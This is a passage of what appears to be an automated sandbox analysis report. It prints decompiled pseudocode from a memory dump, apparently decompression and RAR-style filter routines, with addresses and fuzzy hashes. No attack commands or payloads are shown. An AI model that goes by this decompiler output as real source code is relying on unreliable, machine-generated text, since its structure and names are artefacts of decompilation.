          													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
          													asm("sbb eax, eax");
          													_t264 = _t263 & _t375;
          													__eflags = _t264;
          													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
          													goto L66;
          												}
          												_t377 = _t440 + 0x1e0c + _t261 * 4;
          												while(1) {
          													__eflags = _t430 -  *_t377;
          													if(_t430 <  *_t377) {
          														break;
          													}
          													_t261 = _t261 + 1;
          													_t377 = _t377 + 4;
          													__eflags = _t261 - 0xf;
          													if(_t261 < 0xf) {
          														continue;
          													}
          													goto L65;
          												}
          												_t309 = _t261;
          												goto L65;
          											} else {
          												_t378 = 0x10;
          												_t433 = _t430 >> _t378 - _t260;
          												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
          												 *_t438 =  *_t438 + (_t381 >> 3);
          												 *(_t438 + 4) = _t381 & 0x00000007;
          												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
          												L66:
          												_t448 = _t448 + (_t265 & 0x0000ffff);
          												goto L68;
          											}
          										}
          									}
          								}
          								__eflags =  *(_t440 + 0x4ad8) - 1;
          								if( *(_t440 + 0x4ad8) <= 1) {
          									L34:
          									 *_t295 =  *_t295 & 0x00000000;
          									_t295[2] = _t324;
          									_t295[1] = 0;
          									goto L33;
          								}
          								__eflags =  *(_t295 - 0xc);
          								if( *(_t295 - 0xc) != 0) {
          									goto L34;
          								}
          								_t279 =  *(_t295 - 8) & 0x0000ffff;
          								_t435 = 3;
          								__eflags = _t279 - _t435;
          								if(_t279 >= _t435) {
          									goto L34;
          								}
          								_t280 = _t279 + 1;
          								 *(_t295 - 8) = _t280;
          								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
          								_t68 = _t440 + 0x4ad8;
          								 *_t68 =  *(_t440 + 0x4ad8) - 1;
          								__eflags =  *_t68;
          								goto L33;
          							}
          						}
          					}
          					 *((char*)(_t440 + 0x4ad0)) = 1;
          					goto L94;
          				} else {
          					 *((char*)(_t440 + 0x2c)) = 1;
          					_push(_t440 + 0x30);
          					_push(_t440 + 0x18);
          					_push(_t440 + 4);
          					_t291 = E0020397F(__ecx);
          					if(_t291 != 0) {
          						goto L3;
          					} else {
          						 *((char*)(_t440 + 0x4ad0)) = 1;
          						return _t291;
          					}
          				}
          			}

          0x00000000
          0x00000000
          0x00206968
          0x0020696a
          0x00000000
          0x00206921
          0x00206923
          0x00206926
          0x00206930
          0x00206938
          0x0020693d
          0x00206940
          0x002069a7
          0x002069a7
          0x002069aa
          0x002069ad
          0x002069bd
          0x002069c0
          0x002069c0
          0x002069af
          0x002069af
          0x002069af
          0x002069c2
          0x002069c3
          0x002069c7
          0x002069c9
          0x002069cb
          0x00206ad9
          0x00206ad9
          0x00206adf
          0x00206ae5
          0x00206ae6
          0x00206aea
          0x00206af0
          0x00206af2
          0x00206af3
          0x00206af7
          0x00206afd
          0x00206aff
          0x00206aff
          0x00206b00
          0x00206b00
          0x00206afd
          0x00206af0
          0x00206b04
          0x00206b0c
          0x00206b12
          0x00206b16
          0x00000000
          0x002069d1
          0x002069d1
          0x002069d4
          0x00206ab5
          0x00206abe
          0x00206ac6
          0x00206aca
          0x00206ad1
          0x00206ad3
          0x00206ad3
          0x00206ad6
          0x00000000
          0x00206ad6
          0x002069da
          0x002069de
          0x002069e7
          0x002069f5
          0x002069f9
          0x00206a00
          0x00206a02
          0x00206a02
          0x00206a05
          0x00206a05
          0x00206a0a
          0x00206a11
          0x00206a17
          0x00206a1d
          0x00206a24
          0x00206a51
          0x00206a52
          0x00206a53
          0x00206a55
          0x00206a71
          0x00206a74
          0x00206a7b
          0x00206a7e
          0x00206a81
          0x00206a8c
          0x00206a98
          0x00206a9a
          0x00206aa0
          0x00206aa2
          0x00206aa2
          0x00206aa4
          0x00000000
          0x00206aa4
          0x00206a5d
          0x00206a60
          0x00206a60
          0x00206a62
          0x00000000
          0x00000000
          0x00206a64
          0x00206a65
          0x00206a68
          0x00206a6b
          0x00000000
          0x00000000
          0x00000000
          0x00206a6d
          0x00206a6f
          0x00000000
          0x00206a26
          0x00206a28
          0x00206a2b
          0x00206a35
          0x00206a3d
          0x00206a42
          0x00206a45
          0x00206aac
          0x00206aaf
          0x00000000
          0x00206aaf
          0x00206a24
          0x002069cb
          0x0020691f
          0x00206859
          0x00206860
          0x00206897
          0x00206897
          0x0020689c
          0x0020689f
          0x00000000
          0x0020689f
          0x00206862
          0x00206866
          0x00000000
          0x00000000
          0x00206868
          0x0020686e
          0x0020686f
          0x00206872
          0x00000000
          0x00000000
          0x00206874
          0x00206875
          0x0020687c
          0x00206880
          0x00206880
          0x00206880
          0x00000000
          0x00206880
          0x002067d0
          0x00206723
          0x002066ec
          0x00000000
          0x002066b7
          0x002066ba
          0x002066be
          0x002066c2
          0x002066c6
          0x002066c7
          0x002066ce
          0x00000000
          0x002066d0
          0x002066d0
          0x00000000
          0x002066d0
          0x002066ce

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 3029b96fde79613c09e06af91da118d6a69d65c14f14bf6fbe47353bf324a34f
          • Instruction ID: bfb394a6dc040ffb406fa56cddfb4a2d964dcaa2fa09fa1dd2a8218adacee2ca
          • Opcode Fuzzy Hash: 3029b96fde79613c09e06af91da118d6a69d65c14f14bf6fbe47353bf324a34f
          • Instruction Fuzzy Hash: EE12B0B16247068BD728DF28C998779B7E0FF54308F14892EE597C7A82D374A8B4CB45
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E001FBAD1(signed int* __ecx) {
          				void* __edi;
          				signed int _t194;
          				signed int _t197;
          				void* _t204;
          				signed char _t205;
          				signed int _t215;
          				signed int _t217;
          				signed int _t218;
          				intOrPtr _t219;
          				signed int _t221;
          				signed int _t223;
          				void* _t234;
          				signed int _t235;
          				signed int _t238;
          				signed int _t266;
          				void* _t267;
          				void* _t268;
          				void* _t269;
          				void* _t270;
          				void* _t271;
          				signed int _t274;
          				intOrPtr _t275;
          				void* _t276;
          				signed char* _t277;
          				signed int _t278;
          				signed int _t279;
          				signed int _t281;
          				char _t282;
          				signed int _t284;
          				signed int _t285;
          				signed char _t289;
          				void* _t290;
          				intOrPtr _t292;
          				signed int _t293;
          				signed char* _t297;
          				signed int _t304;
          				signed int _t306;
          				signed int _t308;
          				signed char _t309;
          				signed int _t310;
          				intOrPtr _t311;
          				void* _t312;
          				void* _t313;
          				unsigned int _t316;
          				signed int _t317;
          				signed int _t319;
          				signed int _t320;
          				signed int _t321;
          				signed int _t322;
          				signed char _t323;
          				signed int _t324;
          				signed int _t325;
          				void* _t326;
          				void* _t327;
          				void* _t328;
          				signed int _t331;
          				signed char _t332;
          				signed int _t333;
          				signed char* _t334;
          				signed int _t335;
          				signed int _t336;
          				signed char _t338;
          				unsigned int _t340;
          				signed int _t345;
          				void* _t350;
          				signed int _t351;
          				signed int _t352;
          				signed int _t353;
          				void* _t354;
          				void* _t355;
          
          				_t311 =  *((intOrPtr*)(_t355 + 4));
          				_t339 = __ecx;
          				if(_t311 <= 0) {
          					L15:
          					return 1;
          				}
          				if(_t311 <= 2) {
          					_t194 = __ecx[5];
          					_t284 =  *__ecx;
          					_t340 = __ecx[7];
          					_t276 = _t194 - 4;
          					if(_t276 > 0x3fffc) {
          						L98:
          						return 0;
          					}
          					_t326 = 0;
          					_t197 = (_t194 & 0xffffff00 | _t311 == 0x00000002) + 0xe8;
          					 *(_t355 + 0x60) = _t197;
          					if(_t276 == 0) {
          						goto L15;
          					} else {
          						goto L88;
          					}
          					do {
          						L88:
          						_t312 =  *_t284;
          						_t284 = _t284 + 1;
          						_t327 = _t326 + 1;
          						_t340 = _t340 + 1;
          						if(_t312 == 0xe8 || _t312 == _t197) {
          							_t313 =  *_t284;
          							if(_t313 >= 0) {
          								_t191 = _t313 - 0x1000000; // -16777215
          								if(_t191 < 0) {
          									 *_t284 = _t313 - _t340;
          								}
          							} else {
          								if(_t340 + _t313 >= 0) {
          									_t190 = _t313 + 0x1000000; // 0x1000001
          									 *_t284 = _t190;
          								}
          							}
          							_t197 =  *(_t355 + 0x60);
          							_t284 = _t284 + 4;
          							_t326 = _t327 + 4;
          							_t340 = _t340 + 4;
          						}
          					} while (_t326 < _t276);
          					goto L15;
          				}
          				if(_t311 == 3) {
          					_t277 =  *__ecx;
          					_t328 = __ecx[5] - 0x15;
          					if(_t328 > 0x3ffeb) {
          						goto L98;
          					}
          					_t316 = __ecx[7] >> 4;
          					 *(_t355 + 0x28) = _t316;
          					if(_t328 == 0) {
          						goto L15;
          					}
          					_t331 = (_t328 - 1 >> 4) + 1;
          					 *(_t355 + 0x30) = _t331;
          					do {
          						_t204 = ( *_t277 & 0x1f) - 0x10;
          						if(_t204 < 0) {
          							goto L84;
          						}
          						_t205 =  *((intOrPtr*)(_t204 + 0x22d070));
          						if(_t205 == 0) {
          							goto L84;
          						}
          						_t332 =  *(_t355 + 0x28);
          						_t285 = 0;
          						_t317 = _t205 & 0x000000ff;
          						 *((intOrPtr*)(_t355 + 0x64)) = 0;
          						 *(_t355 + 0x38) = _t317;
          						_t350 = 0x12;
          						do {
          							if((_t317 & 1) != 0) {
          								_t175 = _t350 + 0x18; // 0x2a
          								if(E001FC03A(_t277, _t175, 4) == 5) {
          									E001FC085(_t277, E001FC03A(_t277, _t350, 0x14) - _t332 & 0x000fffff, _t350, 0x14);
          								}
          								_t317 =  *(_t355 + 0x34);
          								_t285 =  *(_t355 + 0x60);
          							}
          							_t285 = _t285 + 1;
          							_t350 = _t350 + 0x29;
          							 *(_t355 + 0x60) = _t285;
          						} while (_t350 <= 0x64);
          						_t331 =  *(_t355 + 0x30);
          						_t316 =  *(_t355 + 0x28);
          						L84:
          						_t277 =  &(_t277[0x10]);
          						_t316 = _t316 + 1;
          						_t331 = _t331 - 1;
          						 *(_t355 + 0x28) = _t316;
          						 *(_t355 + 0x30) = _t331;
          					} while (_t331 != 0);
          					goto L15;
          				}
          				if(_t311 == 4) {
          					_t215 = __ecx[1];
          					_t289 = __ecx[5];
          					_t333 = __ecx[2];
          					 *(_t355 + 0x60) = _t215;
          					_t278 = _t215 - 3;
          					 *(_t355 + 0x28) = _t289;
          					 *(_t355 + 0x34) = _t278;
          					 *(_t355 + 0x3c) = _t333;
          					if(_t289 - 3 > 0x1fffd || _t278 > _t289 || _t333 > 2) {
          						goto L98;
          					} else {
          						_t217 =  *__ecx;
          						 *(_t355 + 0x24) = _t217;
          						_t351 = _t217 + _t289;
          						_t218 = 0;
          						 *(_t355 + 0x14) = _t351;
          						_t319 = _t351 - _t278;
          						 *(_t355 + 0x1c) = 0;
          						 *(_t355 + 0x10) = _t319;
          						do {
          							_t279 = 0;
          							if(_t218 >= _t289) {
          								goto L67;
          							}
          							_t334 = _t319 + _t218;
          							_t320 =  *(_t355 + 0x60);
          							_t221 =  *(_t355 + 0x34) - _t351;
          							_t352 =  *(_t355 + 0x34);
          							 *(_t355 + 0x20) = _t221;
          							do {
          								if( &(_t334[_t221]) >= _t320) {
          									_t227 =  *_t334 & 0x000000ff;
          									_t291 =  *(_t334 - 3) & 0x000000ff;
          									 *(_t355 + 0x30) =  *_t334 & 0x000000ff;
          									 *(_t355 + 0x2c) =  *(_t334 - 3) & 0x000000ff;
          									 *(_t355 + 0x3c) = E00214E62(_t320, _t227 - _t291 + _t279 - _t279);
          									 *(_t355 + 0x24) = E00214E62(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
          									_t234 = E00214E62(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
          									_t292 =  *((intOrPtr*)(_t355 + 0x44));
          									_t355 = _t355 + 0xc;
          									_t321 =  *(_t355 + 0x18);
          									if(_t292 > _t321 || _t292 > _t234) {
          										_t289 =  *(_t355 + 0x28);
          										_t320 =  *(_t355 + 0x60);
          										_t279 =  *(_t355 + 0x30);
          										if(_t321 > _t234) {
          											_t279 =  *(_t355 + 0x2c);
          										}
          									} else {
          										_t289 =  *(_t355 + 0x28);
          										_t320 =  *(_t355 + 0x60);
          									}
          								}
          								_t223 =  *(_t355 + 0x24);
          								_t279 = _t279 -  *_t223 & 0x000000ff;
          								 *(_t355 + 0x24) = _t223 + 1;
          								_t334[_t352] = _t279;
          								_t334 =  &(_t334[3]);
          								_t221 =  *(_t355 + 0x20);
          							} while ( &(_t334[ *(_t355 + 0x20)]) < _t289);
          							_t351 =  *(_t355 + 0x14);
          							_t218 =  *(_t355 + 0x1c);
          							_t319 =  *(_t355 + 0x10);
          							L67:
          							_t218 = _t218 + 1;
          							 *(_t355 + 0x1c) = _t218;
          						} while (_t218 < 3);
          						_t335 =  *(_t355 + 0x3c);
          						_t290 = _t289 + 0xfffffffe;
          						while(_t335 < _t290) {
          							_t219 =  *((intOrPtr*)(_t335 + _t351 + 1));
          							 *((intOrPtr*)(_t335 + _t351)) =  *((intOrPtr*)(_t335 + _t351)) + _t219;
          							 *((intOrPtr*)(_t335 + _t351 + 2)) =  *((intOrPtr*)(_t335 + _t351 + 2)) + _t219;
          							_t335 = _t335 + 3;
          						}
          						goto L15;
          					}
          				}
          				if(_t311 == 5) {
          					_t235 = __ecx[5];
          					_t293 =  *__ecx;
          					_t281 = __ecx[1];
          					 *(_t355 + 0x2c) = _t293;
          					 *(_t355 + 0x30) = _t235;
          					 *(_t355 + 0x38) = _t293 + _t235;
          					if(_t235 > 0x20000 || _t281 > 0x80 || _t281 == 0) {
          						goto L98;
          					} else {
          						_t336 = 0;
          						 *(_t355 + 0x34) = 0;
          						if(_t281 == 0) {
          							goto L15;
          						} else {
          							goto L21;
          						}
          						do {
          							L21:
          							 *(_t355 + 0x20) =  *(_t355 + 0x20) & 0x00000000;
          							 *(_t355 + 0x1c) =  *(_t355 + 0x1c) & 0x00000000;
          							_t345 = 0;
          							 *(_t355 + 0x18) =  *(_t355 + 0x18) & 0x00000000;
          							_t353 = 0;
          							 *(_t355 + 0x14) =  *(_t355 + 0x14) & 0x00000000;
          							 *(_t355 + 0x60) =  *(_t355 + 0x60) & 0;
          							 *(_t355 + 0x1c) = 0;
          							E0020E920(_t336, _t355 + 0x40, 0, 0x1c);
          							 *(_t355 + 0x34) =  *(_t355 + 0x34) & 0;
          							_t355 = _t355 + 0xc;
          							 *(_t355 + 0x24) = _t336;
          							if(_t336 <  *(_t355 + 0x30)) {
          								_t238 =  *(_t355 + 0x60);
          								do {
          									_t322 =  *(_t355 + 0x1c);
          									 *(_t355 + 0x14) = _t322 -  *(_t355 + 0x18);
          									_t297 =  *(_t355 + 0x2c);
          									 *(_t355 + 0x18) = _t322;
          									_t323 =  *_t297 & 0x000000ff;
          									 *(_t355 + 0x2c) =  &(_t297[1]);
          									_t304 = ( *(_t355 + 0x14) * _t238 + _t345 *  *(_t355 + 0x14) + _t353 *  *(_t355 + 0x1c) +  *(_t355 + 0x20) * 0x00000008 >> 0x00000003 & 0x000000ff) - _t323;
          									 *( *(_t355 + 0x24) +  *(_t355 + 0x38)) = _t304;
          									_t349 = _t323 << 3;
          									 *(_t355 + 0x20) = _t304 -  *(_t355 + 0x20);
          									 *(_t355 + 0x24) = _t304;
          									 *((intOrPtr*)(_t355 + 0x44)) =  *((intOrPtr*)(_t355 + 0x44)) + E00214E62(_t323, _t323 << 3);
          									 *((intOrPtr*)(_t355 + 0x4c)) =  *((intOrPtr*)(_t355 + 0x4c)) + E00214E62(_t323, (_t323 << 3) -  *(_t355 + 0x1c));
          									 *((intOrPtr*)(_t355 + 0x54)) =  *((intOrPtr*)(_t355 + 0x54)) + E00214E62(_t323,  *(_t355 + 0x20) + (_t323 << 3));
          									 *((intOrPtr*)(_t355 + 0x5c)) =  *((intOrPtr*)(_t355 + 0x5c)) + E00214E62(_t323, (_t323 << 3) -  *(_t355 + 0x20));
          									 *((intOrPtr*)(_t355 + 0x64)) =  *((intOrPtr*)(_t355 + 0x64)) + E00214E62(_t323,  *(_t355 + 0x24) + _t349);
          									 *((intOrPtr*)(_t355 + 0x6c)) =  *((intOrPtr*)(_t355 + 0x6c)) + E00214E62(_t323, _t349 -  *(_t355 + 0x14));
          									 *((intOrPtr*)(_t355 + 0x74)) =  *((intOrPtr*)(_t355 + 0x74)) + E00214E62(_t323, _t349 +  *(_t355 + 0x14));
          									_t355 = _t355 + 0x1c;
          									if(( *(_t355 + 0x28) & 0x0000001f) != 0) {
          										_t345 =  *(_t355 + 0x10);
          										_t238 =  *(_t355 + 0x60);
          									} else {
          										_t324 =  *(_t355 + 0x40);
          										_t266 = 0;
          										 *(_t355 + 0x40) =  *(_t355 + 0x40) & 0;
          										_t308 = 1;
          										do {
          											if( *(_t355 + 0x40 + _t308 * 4) < _t324) {
          												_t324 =  *(_t355 + 0x40 + _t308 * 4);
          												_t266 = _t308;
          											}
          											 *(_t355 + 0x40 + _t308 * 4) =  *(_t355 + 0x40 + _t308 * 4) & 0x00000000;
          											_t308 = _t308 + 1;
          										} while (_t308 < 7);
          										_t345 =  *(_t355 + 0x10);
          										_t267 = _t266 - 1;
          										if(_t267 == 0) {
          											_t238 =  *(_t355 + 0x60);
          											if(_t353 >= 0xfffffff0) {
          												_t353 = _t353 - 1;
          											}
          											goto L49;
          										}
          										_t268 = _t267 - 1;
          										if(_t268 == 0) {
          											_t238 =  *(_t355 + 0x60);
          											if(_t353 < 0x10) {
          												_t353 = _t353 + 1;
          											}
          											goto L49;
          										}
          										_t269 = _t268 - 1;
          										if(_t269 == 0) {
          											_t238 =  *(_t355 + 0x60);
          											if(_t345 < 0xfffffff0) {
          												goto L49;
          											}
          											_t345 = _t345 - 1;
          											L43:
          											 *(_t355 + 0x10) = _t345;
          											goto L49;
          										}
          										_t270 = _t269 - 1;
          										if(_t270 == 0) {
          											_t238 =  *(_t355 + 0x60);
          											if(_t345 >= 0x10) {
          												goto L49;
          											}
          											_t345 = _t345 + 1;
          											goto L43;
          										}
          										_t271 = _t270 - 1;
          										if(_t271 == 0) {
          											_t238 =  *(_t355 + 0x60);
          											if(_t238 < 0xfffffff0) {
          												goto L49;
          											}
          											_t238 = _t238 - 1;
          											L36:
          											 *(_t355 + 0x60) = _t238;
          											goto L49;
          										}
          										_t238 =  *(_t355 + 0x60);
          										if(_t271 != 1 || _t238 >= 0x10) {
          											goto L49;
          										} else {
          											_t238 = _t238 + 1;
          											goto L36;
          										}
          									}
          									L49:
          									_t306 =  *(_t355 + 0x24) + _t281;
          									 *(_t355 + 0x28) =  *(_t355 + 0x28) + 1;
          									 *(_t355 + 0x24) = _t306;
          								} while (_t306 <  *(_t355 + 0x30));
          								_t336 =  *(_t355 + 0x34);
          							}
          							_t336 = _t336 + 1;
          							 *(_t355 + 0x34) = _t336;
          						} while (_t336 < _t281);
          						goto L15;
          					}
          				}
          				if(_t311 != 6) {
          					goto L15;
          				}
          				_t309 = __ecx[5];
          				_t354 = 0;
          				_t325 = __ecx[1];
          				 *(_t355 + 0x28) = _t309;
          				 *(_t355 + 0x60) = _t309 + _t309;
          				if(_t309 > 0x20000 || _t325 > 0x400 || _t325 == 0) {
          					goto L98;
          				} else {
          					_t274 = _t325;
          					 *(_t355 + 0x24) = _t325;
          					do {
          						_t282 = 0;
          						_t338 = _t309;
          						if(_t309 <  *(_t355 + 0x60)) {
          							_t310 =  *(_t355 + 0x60);
          							goto L12;
          							L12:
          							_t275 =  *_t339;
          							_t282 = _t282 -  *((intOrPtr*)(_t275 + _t354));
          							_t354 = _t354 + 1;
          							 *((char*)(_t275 + _t338)) = _t282;
          							_t338 = _t338 + _t325;
          							if(_t338 < _t310) {
          								goto L12;
          							} else {
          								_t309 =  *(_t355 + 0x28);
          								_t274 =  *(_t355 + 0x24);
          								goto L14;
          							}
          						}
          						L14:
          						_t309 = _t309 + 1;
          						_t274 = _t274 - 1;
          						 *(_t355 + 0x28) = _t309;
          						 *(_t355 + 0x24) = _t274;
          					} while (_t274 != 0);
          					goto L15;
          				}
          			}

          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5b7348fac5b5266677d56d108830bc9eb334196f60ccd0724cd05940f6a30d29
          • Instruction ID: 0580e482c8d0d4427e2948f91dc4f9b3b32e846c20b07f430d7619105a4d0cf4
          • Opcode Fuzzy Hash: 5b7348fac5b5266677d56d108830bc9eb334196f60ccd0724cd05940f6a30d29
          • Instruction Fuzzy Hash: FAF18971A083498FC718CF29C5C457ABBE6FBD9358F144A2EF68987255D730E906CB82
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00210113(void* __edx, void* __esi) {
          				signed int _t192;
          				signed char _t193;
          				signed char _t194;
          				signed char _t195;
          				signed char _t196;
          				signed char _t198;
          				signed int _t241;
          				void* _t287;
          				void* _t292;
          				void* _t294;
          				void* _t296;
          				void* _t298;
          				void* _t300;
          				void* _t302;
          				void* _t304;
          				void* _t306;
          				void* _t308;
          				void* _t310;
          				void* _t312;
          				void* _t314;
          				void* _t316;
          				void* _t318;
          				void* _t320;
          				void* _t322;
          				void* _t324;
          				void* _t326;
          				void* _t327;
          
          				_t327 = __esi;
          				_t287 = __edx;
          				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
          					_t241 = 0;
          					L15:
          					if(_t241 != 0) {
          						goto L2;
          					}
          					_t193 =  *(_t327 - 0x1a);
          					if(_t193 ==  *(_t287 - 0x1a)) {
          						_t241 = 0;
          						L26:
          						if(_t241 != 0) {
          							goto L2;
          						}
          						_t194 =  *(_t327 - 0x16);
          						if(_t194 ==  *(_t287 - 0x16)) {
          							_t241 = 0;
          							L37:
          							if(_t241 != 0) {
          								goto L2;
          							}
          							_t195 =  *(_t327 - 0x12);
          							if(_t195 ==  *(_t287 - 0x12)) {
          								_t241 = 0;
          								L48:
          								if(_t241 != 0) {
          									goto L2;
          								}
          								_t196 =  *(_t327 - 0xe);
          								if(_t196 ==  *(_t287 - 0xe)) {
          									_t241 = 0;
          									L59:
          									if(_t241 != 0) {
          										goto L2;
          									}
          									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
          										_t241 = 0;
          										L70:
          										if(_t241 != 0) {
          											goto L2;
          										}
          										_t198 =  *(_t327 - 6);
          										if(_t198 ==  *(_t287 - 6)) {
          											_t241 = 0;
          											L81:
          											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
          											}
          											goto L2;
          										}
          										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
          										if(_t292 == 0) {
          											L74:
          											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
          											if(_t294 == 0) {
          												L76:
          												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
          												if(_t296 == 0) {
          													L78:
          													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
          													if(_t241 != 0) {
          														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
          													}
          													goto L81;
          												}
          												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
          												if(_t241 != 0) {
          													goto L2;
          												}
          												goto L78;
          											}
          											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
          											if(_t241 != 0) {
          												goto L2;
          											}
          											goto L76;
          										}
          										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
          										if(_t241 != 0) {
          											goto L2;
          										}
          										goto L74;
          									}
          									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
          									if(_t298 == 0) {
          										L63:
          										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
          										if(_t300 == 0) {
          											L65:
          											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
          											if(_t302 == 0) {
          												L67:
          												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
          												if(_t241 != 0) {
          													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
          												}
          												goto L70;
          											}
          											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
          											if(_t241 != 0) {
          												goto L2;
          											}
          											goto L67;
          										}
          										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
          										if(_t241 != 0) {
          											goto L2;
          										}
          										goto L65;
          									}
          									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
          									if(_t241 != 0) {
          										goto L2;
          									}
          									goto L63;
          								}
          								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
          								if(_t304 == 0) {
          									L52:
          									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
          									if(_t306 == 0) {
          										L54:
          										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
          										if(_t308 == 0) {
          											L56:
          											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
          											if(_t241 != 0) {
          												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
          											}
          											goto L59;
          										}
          										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
          										if(_t241 != 0) {
          											goto L2;
          										}
          										goto L56;
          									}
          									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
          									if(_t241 != 0) {
          										goto L2;
          									}
          									goto L54;
          								}
          								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
          								if(_t241 != 0) {
          									goto L2;
          								}
          								goto L52;
          							}
          							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
          							if(_t310 == 0) {
          								L41:
          								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
          								if(_t312 == 0) {
          									L43:
          									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
          									if(_t314 == 0) {
          										L45:
          										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
          										if(_t241 != 0) {
          											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
          										}
          										goto L48;
          									}
          									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
          									if(_t241 != 0) {
          										goto L2;
          									}
          									goto L45;
          								}
          								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
          								if(_t241 != 0) {
          									goto L2;
          								}
          								goto L43;
          							}
          							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
          							if(_t241 != 0) {
          								goto L2;
          							}
          							goto L41;
          						}
          						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
          						if(_t316 == 0) {
          							L30:
          							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
          							if(_t318 == 0) {
          								L32:
          								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
          								if(_t320 == 0) {
          									L34:
          									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
          									if(_t241 != 0) {
          										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
          									}
          									goto L37;
          								}
          								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
          								if(_t241 != 0) {
          									goto L2;
          								}
          								goto L34;
          							}
          							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
          							if(_t241 != 0) {
          								goto L2;
          							}
          							goto L32;
          						}
          						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
          						if(_t241 != 0) {
          							goto L2;
          						}
          						goto L30;
          					}
          					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
          					if(_t322 == 0) {
          						L19:
          						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
          						if(_t324 == 0) {
          							L21:
          							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
          							if(_t326 == 0) {
          								L23:
          								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
          								if(_t241 != 0) {
          									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
          								}
          								goto L26;
          							}
          							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
